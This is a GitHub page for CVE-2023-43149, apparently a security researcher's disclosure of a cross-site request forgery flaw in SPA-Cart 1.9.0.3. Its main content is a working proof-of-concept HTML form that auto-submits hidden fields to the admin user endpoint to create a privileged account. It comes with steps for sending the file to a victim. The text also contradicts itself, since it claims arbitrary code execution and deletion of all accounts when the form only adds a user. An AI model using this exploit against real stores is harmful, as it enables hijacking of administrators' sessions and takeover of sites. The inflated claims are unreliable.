Headline
CVE-2023-43149: GitHub - MinoTauro2020/CVE-2023-43149: CVE-2023-43149
SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code
Use Git or checkout with SVN using the web URL.
Open with GitHub Desktop
Download ZIP
Latest commit
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
# CVE-2023-43149 #Author : Aitor Herrero Fuentes
Vendor: SPA-Cart
Vendor Homepage: https://spa-cart.com/
Software Link: https://demo.spa-cart.com/admin
Version: 1.9.0.3
Tested on: Windows 10 Pro
CSRF ADD ROOT ACCOUNT
Cross Site Request Forgery vulnerability in application demo.spa-cart.com allows a remote attacker to execute arbitrary code , add an malicius user with “role status” with one click
A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code.
This code could then be used to delete all accounts.
POC
1 - Make an file with with this CODE and SAVE in HTML Attack Delete All Account
<html> <body> <form action="https://demo.spa-cart.com/admin/user/859" method="POST" enctype="multipart/form-data"> <input type="hidden" name="posted_data[firstname]" value="mal1" /> <input type="hidden" name="posted_data[lastname]" value="mal2" /> <input type="hidden" name="posted_data[phone]" value="156415641561" /> <input type="hidden" name="posted_data[email]" value="[email protected]" /> <input type="hidden" name="password" value="" /> <input type="hidden" name="posted_data[usertype]" value="C" /> <input type="hidden" name="posted_data[roleid]" value="1" /> <input type="hidden" name="posted_data[status]" value="1" /> <input type="hidden" name="posted_data[address]" value="" /> <input type="hidden" name="posted_data[city]" value="" /> <input type="hidden" name="posted_data[state]" value="" /> <input type="hidden" name="posted_data[country]" value="AG" /> <input type="hidden" name="posted_data[zipcode]" value="05584" /> <input type="hidden" name="posted_data[pending_membershipid]" value="1" /> <input type="hidden" name="posted_data[membershipid]" value="1" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('’, '’, ‘/’); document.forms[0].submit(); </script> </body> </html>
2 - Example test.html
3 - Send to the victim
4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button the code will changes in his actually session.